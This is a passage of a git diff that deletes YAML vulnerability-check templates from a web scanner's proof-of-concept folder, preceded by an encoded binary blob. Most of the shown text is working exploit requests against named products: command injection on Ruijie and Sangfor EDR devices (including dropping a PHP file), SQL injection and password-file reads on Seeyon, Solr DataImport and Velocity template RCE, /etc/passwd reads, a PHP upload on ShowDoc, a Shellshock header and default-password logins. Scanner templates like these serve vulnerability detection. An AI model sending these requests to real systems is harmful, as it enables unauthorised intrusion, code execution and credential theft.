zLFpU&hta1_^MXDZ-=uNNfo(>4*K{9bTU+!yy%bq_qG$P+FdBXg)zukB!+8>ae|Zci z(Wryr4x}8OSD|cU{;?=Ky>^c2orBhlnXqQ`X=U4LT!CG?K40wa`=-LCcuM!5G>80} zUq1F{%kI0K=Jbj`wyQiWD5}b>Q^;={-DHI$_CIMJJ|I`<%J)j@AD?K@s96M7?-{_=|WUh($&2uoYLl} ztdmE#>Q{1*zdhsA-U&UI2bJEaz0pTH$EH&c=exlP%X=kXI=sWrJ~~<YRayUp#V_XH{7X{lH1B54y4#m;9(j0dOLEu){sNzm$IW%KJFw@g z4e7;CUv{Ql;e2{?B+7b;UQD4dyLwmX?ixW%SfM~Day85=zg%-g`4mM^wE4T$ppV54 zs*?V3Ho0AzUQDje_H91hUwX8l@1*^=ii>hC*v^C0`Wws}#rWp(RIKZlPvf3HL7vt@m4YM%3^TxeUq z^1IHbSLO=bmS(wq&wuL6&q_>M^xFP??!c|J!ZBR4_CYzyU5lozy{cR@c-Pqt2M(0H zKfO0<*3rGcG{3v_#e>ELe6J;olh;Z1XFJ9=-~8yKim2APn>r2|xtQN4rQ?|FDWkj> z`0PwhxOU;c<2of2tNB@uua~U5n$)!FlGD`-E{zvwzD!?nC-_m+{J`F#NWZ^4#<%}u z&BSq`@6NBNX&n2X6&^>*vTyvjYjl(Rp|YIE7h8)IU2{i<nkI zHDRqc^dmroOQgYYVGZu7g))x|NbCK)N@uZqqDJEL+m#(dqZa+E`pD4goTh_NvevFp-o7`t0y?65xaXDb!S)~Txqe)>i2lY zqlf4LoCfrBqVyBO!yEMUO*4-RQ;1>+po@!(Nc%k48uf1eb5-pHz(??Pq<{tO0H|$? z`e7ARgNsSppj;&B)`Nz*E^1Tf5Ft>m!Pk!>`N4x-k^~LW#ZBPufgX>lG)gsW;*n4O z>VxAS!`gLRp-XW9fCXUJ-W0q5g3B;)Pm#Nr(}0KzYMz7 zNT7G1$V(ukijEv0jWj=6V3lyy!7{7jdT}bh5kStsM^~MlaL){qK!&1cI)-6F6#=)i z4KXc9&59cpXop@5#4-!y1Tj63Ls47oMrl?Ip-A+=2w9LEV!Xx@WVVOHxt+IMGh9-O;aAi#TWB(0_o?KUj4Zd1F56juZ7E{uz` zaL0do}5_Zs?CgH4QbCmdyCL9>lGu#&cjnG zJxTY+JxCT1pi;uBgVNVlUWdZJ{Q6+iahrxN&gR}Fd-G*frw^%V~ zOK-qkg3p0!ZIAo$crvLl6RyFfSt|W28^uHwl-$LrCrY0VC+BXQIt(IO>(zm}<|#1Q@eRL3I||FJGT$i+ z1}Ono1790TnW-}Y2eylr$)#bDCaW_p6zha#7ShV`lzS=w(mWUDl+~hLaaad+;I^TEUx9INsSb)-f;5!MA z7c7!Oj16hHBqErTC}TNo&QSwN% zWvZV^xpVHGF51i5)+jgd%Gw-f06BtkbpJPA#^cH5k>UXYE?lFwR+;6+i*5a(e00x% zp2u$p48#a5E5UCZOou&L%1|D5EhFmu-oaDvX+i_UBM4O4@Tz!g)M!TTrAb zP}?V3+VC9Z+c5107y6by1e%SJAr%oc(QMzl%%4VKnKh*U<>mMIfcgPGKGi42t9d+y zL>UkviADECq?$+w@5O~g>asp+AGaEr6jQKCvCL9))n^U+J3T1s3ymczTRSns67!GF z-uY-_cQ7;ux+5MLt!0KssA6LAh%JN-a>xgz2-IGZA-j|Y^UAMHMiC`~fk$`5zr`RP zx*3J`JpDCHXhjmXeL3w$EVBl+7xgOb4zO`XFrRsKFnJj07!C~(E;+*;E!L8_aBN8| zv#^0%Wbc0j*gk;K4dUQ@X#H>(OvTA!*bBD;cQ>OQI!v%cjPqW-KLv<|K%{2~E53n9 z1Tr=37r`*fDT4x|O?4{=57K7DGOHOsGr`^mR$@3R2`%V`j-Q{Z4tmz9jH8MtIiB-^Mx4x@my*NCKCX@cY; z&}NJvNm=={@vzM5^l#{AC1K#Cw?L!&E*QIhngau>i&!Yq%^~GVsX~J$L2LuSG)wd;Yd_pX;TN*uqdU!#H55Hk zrq+a8I@f3@HCf$r&nzIe2K&;(YfzGw8mZO<#B%-;X=s27w&P4JZf-$nLUgc)6~r=Y z-Y+MP3fu;$c2H^P{<(G?pj1*WRstIX(2bzEsuaaNh65FuA>t!heK5lkGj`v{4rqmA z59;-zTzY>!k2hC7FIdh6!r}wn&=FOLv~O5oC7c#ap{3!=U7P4cQIG|ZCIT1=5I1fGo% zuka@WPa}bbpo|KD5PYzIA#`;U86DfOJS?-GTQSvU0UBW?(EjMQuptFbH6#jkq#Bxe z-DJhZ&Ben-*Si_Q!`G*%Ik5Ep<4@WEcsYEuKV#Am7zSAAS!4mQA~&r6bseqAMJvYO zYJ_E0-;~~Q6V-r3wUr(YukWO>(ny$qny9eN)U+qfk!*JO1-H^GNRwiA(lu=UAynz(FBtP+=~AJ8Ftd#IuGUP{TnI#!4zhU%h;$h4$_ zUAEB9!#{#mP&oD4F=Wz?P)%s)>7NZy+yn)j*u~Yw{8=;$#WD+>79$zZ1)!)&(B1Xa zg9a#$lZqdc)u){~P}}>78S?;wE^E*WhMgG%NDXgrlqz%n!-Zr2VVTuxRNFmUZviYB zVDyZ7`e6giFuKZ&?(T5sXqRD`dEO31+L;~ZVVULKSpQ9W2jHP|Nt*ZQl6juc=#&?i zZ;AKEq3?51$J+<=qeo5AuXQ|K`x0}mp6=RIY1U{)=ep;E8__?`@MT>wkm~hWLv^AP z#*?JttC(aWeLSgDfIICjEVJ&S)3KANzjMr>j2bpB8@me2EQ?NaPO_R_!z{8U5=qak zQH{>}P2vKt1CGrBZViIYb4?=hb7_Q;(V}M44#F~PG&(^tiLimoFLhez(?>y9G#w(L}lJJjWQZ}SrnF81Jc<} zNz}c3(7eE8gD5ITJTr@TymRS^?h>=81DT0h7X45i~4GWiTiA5(B zBw3XY^(-RApfvG()e%^liBSZ3`;rnsq>6|qzI$;{g z@_JgwGL=5f8XBEdjHGRPM$n9Nj9CMtvt^O60nY(uGItiq$$G1E*X~^13=_+&yXe$X zBuD-NIQ1o(vIa+IMf_?y!McvluR?O2$_?ClvaMLdr1ON3%$!#Z&KhD3n9f>3f{#_0&S61P zo{gnlY0ji{UIdbI^0iR}`nsJ;v!~@O7t5?G=}ZA6*ZECDxJL6V48nC6%Pg1Ld39}UO+ZrYvo0??WzpsZ$M5?xiN=H#9sSo}& zQ0t4SOhRop(0;`-YhF4gF9~gAV^bF*R$rNk2))+8=m@kVEFPY37|tBfkK}c2uH}Wv4c7{pxOvv# z=pb$+uA&9t3?Zou+q%Xf-K@dVk;+KyVmLRd!`2hGjKp%qv@@~H8kY{aMPh{xEY>Ih zmnq;cRk{hKIUpUvi3Co9ixoIlQ2ha&tl`p8iAZiW96Vw!9izw^4jo2^lWO_$EzZTbY*x|Be{O<2`kP4Q}55 E19axX+5i9m literal 0 HcmV?d00001 diff --git a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml deleted file mode 100644 index 9bc1287..0000000 --- a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-qizhi-fortressaircraft-unauthorized - -rules: - - method: GET - path: >- - /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm - expression: | - response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") -detail: - author: we1x4n(https://we1x4n.com/) - links: - - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw \ No newline at end of file diff --git a/WebScan/pocs/rockmongo-default-password.yml b/WebScan/pocs/rockmongo-default-password.yml deleted file mode 100644 index c0b3566..0000000 --- a/WebScan/pocs/rockmongo-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-rockmongo-default-password -rules: - - method: POST - path: /index.php?action=login.index&host=0 - body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0" -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://www.runoob.com/mongodb/working-with-rockmongo.html \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-info-leak.yml b/WebScan/pocs/ruijie-eg-info-leak.yml deleted file mode 100644 index 1150806..0000000 --- a/WebScan/pocs/ruijie-eg-info-leak.yml +++ /dev/null @@ -1,24 +0,0 @@ -name: poc-yaml-ruijie-eg-info-leak -rules: - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=admin&password=admin?show+webmaster+user - expression: "true" - search: | - {"data":".*?(?P\w+)\s?(?P\w+)","status":1} - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username={{username}}&password={{password}} - expression: | - response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}") -detail: - author: Search?=Null - description: "Ruijie EG网关信息泄漏" - links: - - https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml deleted file mode 100644 index 2aac600..0000000 --- a/WebScan/pocs/ruijie-eg-rce.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-ruijie-eg-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - phpcode: > - "" - payload: base64(phpcode) -rules: - - method: POST - path: "/guest_auth/guestIsUp.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" - body: | - ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 - expression: | - response.status == 200 - - method: GET - path: "/guest_auth/{{r2}}.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - expression: | - response.body.bcontains(bytes(r1)) -detail: - author: White(https://github.com/WhiteHSBG) - links: - - https://xz.aliyun.com/t/9016?page=1 \ No newline at end of file diff --git a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml b/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml deleted file mode 100644 index e3a3d68..0000000 --- a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-ruijie-nbr1300g-cli-password-leak -rules: - - method: POST - path: /WEB_VMS/LEVEL15/ - follow_redirects: false - headers: - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - body: | - command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. - expression: | - response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest")) -detail: - author: abbin777 - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html diff --git a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml b/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml deleted file mode 100644 index 579c15e..0000000 --- a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ruijie-rce-cnvd-2021-09650 -set: - r1: randomLowercase(9) -rules: - - method: POST - path: /guest_auth/guestIsUp.php - body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 - - method: GET - path: /guest_auth/{{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"uid") -detail: - author: jdr - info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE) - links: - - https://github.com/opsxcq/exploit-CVE-2014-6271/ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml deleted file mode 100644 index 6aa046e..0000000 --- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-ruijie-uac-cnvd-2021-14536 -rules: - - method: GET - path: /login.php - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 \ No newline at end of file diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml deleted file mode 100644 index 63f6a1b..0000000 --- a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-saltstack-cve-2021-25282-file-write -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /run - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async") - - method: POST - path: /run - headers: - Content-type: application/json - body: >- - {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"} - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://www.anquanke.com/post/id/232748 \ No newline at end of file diff --git a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml b/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml deleted file mode 100644 index 43debed..0000000 --- a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-sangfor-edr-arbitrary-admin-login -rules: - - method: GET - path: /ui/login.php?user=admin - follow_redirects: false - expression: > - response.status == 302 && - response.body.bcontains(b"/download/edr_installer_") && - response.headers["Set-Cookie"] != "" -detail: - author: hilson - links: - - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA diff --git a/WebScan/pocs/sangfor-edr-cssp-rce.yml b/WebScan/pocs/sangfor-edr-cssp-rce.yml deleted file mode 100644 index 4dafccb..0000000 --- a/WebScan/pocs/sangfor-edr-cssp-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-sangfor-edr-cssp-rce -rules: - - method: POST - path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - {"params":"w=123\"'1234123'\"|id"} - expression: > - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") -detail: - author: x1n9Qi8 - Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" - links: - - https://www.cnblogs.com/0day-li/p/13650452.html diff --git a/WebScan/pocs/sangfor-edr-tool-rce.yml b/WebScan/pocs/sangfor-edr-tool-rce.yml deleted file mode 100644 index 5a97ff7..0000000 --- a/WebScan/pocs/sangfor-edr-tool-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-sangfor-edr-tool-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(8) -rules: - - method: GET - path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: cookie - links: - - https://edr.sangfor.com.cn/ diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml deleted file mode 100644 index b655ab7..0000000 --- a/WebScan/pocs/seeyon-a6-employee-info-leak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-a6-employee-info-leak -rules: - - method: GET - path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 - expression: - response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml deleted file mode 100644 index fde5f2a..0000000 --- a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-a6-test-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml deleted file mode 100644 index 92ce028..0000000 --- a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-seeyon-ajax-unauthorized-access -rules: - - method: GET - path: /seeyon/thirdpartyController.do.css/..;/ajax.do - expression: | - response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) - - method: GET - path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile - expression: | - response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") - -detail: - author: x1n9Qi8 - links: - - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA - - https://buaq.net/go-53721.html diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml deleted file mode 100644 index f6373ff..0000000 --- a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-cnvd-2020-62422-readfile -rules: - - method: GET - path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") -detail: - author: Aquilao(https://github.com/Aquilao) - info: seeyon readfile(CNVD-2020-62422) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 diff --git a/WebScan/pocs/seeyon-session-leak.yml b/WebScan/pocs/seeyon-session-leak.yml deleted file mode 100644 index 4722203..0000000 --- a/WebScan/pocs/seeyon-session-leak.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-seeyon-session-leak -rules: - - method: GET - path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll - expression: - response.status == 200 && response.body.bcontains(b"\r\n\r\n") -detail: - author: sakura404x - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-setextno-jsp-sql.yml b/WebScan/pocs/seeyon-setextno-jsp-sql.yml deleted file mode 100644 index 84b6acb..0000000 --- a/WebScan/pocs/seeyon-setextno-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-setextno-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23 - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-unauthoried.yml b/WebScan/pocs/seeyon-unauthoried.yml deleted file mode 100644 index a0777ec..0000000 --- a/WebScan/pocs/seeyon-unauthoried.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-seeyon-unauthoried -rules: - - method: POST - path: "/seeyon/thirdpartyController.do" - expression: "true" - body: | - method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 - search: >- - JSESSIONID=(?P.+?) - - method: GET - path: "/seeyon/main.do" - headers: - Cookie: JSESSIONID={{session}} - expression: | - response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml deleted file mode 100644 index 0921919..0000000 --- a/WebScan/pocs/showdoc-uploadfile.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-showdoc-uploadfile -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /index.php?s=/home/page/uploadImg - headers: - Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633" - follow_redirects: false - body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--" - expression: | - response.status == 200 && response.body.bcontains(b"success") - search: | - (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php) - - method: GET - path: /Public/Uploads/{{date}}/{{file}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r2)) -detail: - author: White(https://github.com/WhiteHSBG) - Affected Version: "showdoc <= 2.8.6" - links: - - https://github.com/star7th/showdoc/pull/1059 \ No newline at end of file diff --git a/WebScan/pocs/solr-cve-2019-0193.yml b/WebScan/pocs/solr-cve-2019-0193.yml deleted file mode 100644 index 28e4b75..0000000 --- a/WebScan/pocs/solr-cve-2019-0193.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: poc-yaml-solr-cve-2019-0193 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /solr/admin/cores?wt=json - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: '"name":"(?P.*?)"' - - method: POST - path: >- - /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E - headers: - Content-Type: text/html - body: |- - - - - - - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fnmsd(https://github.com/fnmsd) - solr_version: '<8.1.12' - vulnpath: '/solr/{{core}}/dataimport' - description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)' - links: - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml deleted file mode 100644 index 0b92afd..0000000 --- a/WebScan/pocs/solr-fileread1.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread1 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///etc/passwd - expression: | - response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml deleted file mode 100644 index 60def9e..0000000 --- a/WebScan/pocs/solr-fileread2.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread2 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: "true" - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///c://windows/win.ini - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-velocity-template-rce.yml b/WebScan/pocs/solr-velocity-template-rce.yml deleted file mode 100644 index 4529340..0000000 --- a/WebScan/pocs/solr-velocity-template-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-solr-velocity-template-rce -set: - r1: randomInt(20000, 40000) - r2: randomInt(20000, 40000) -rules: - - method: GET - path: "/solr/admin/cores?wt=json" - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: | - "name":"(?P[^"]+)" - - method: POST - path: >- - /solr/{{core}}/config - headers: - Content-Type: application/json - body: |- - { - "update-queryresponsewriter": { - "startup": "test", - "name": "velocity", - "class": "solr.VelocityResponseWriter", - "template.base.dir": "", - "solr.resource.loader.enabled": "true", - "params.resource.loader.enabled": "true" - } - } - expression: response.status == 200 - - method: GET - path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c" - follow_redirects: false - expression: response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: Loneyer - description: 'Apache Solr RCE via Velocity template' - links: - - https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt - - https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2 diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml deleted file mode 100644 index 4b00104..0000000 --- a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-sonicwall-ssl-vpn-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(1140000, 1144800) -rules: - - method: GET - path: /cgi-bin/jarrewrite.sh - follow_redirects: false - headers: - X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) -detail: - author: sharecast - links: - - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml deleted file mode 100644 index db481ae..0000000 --- 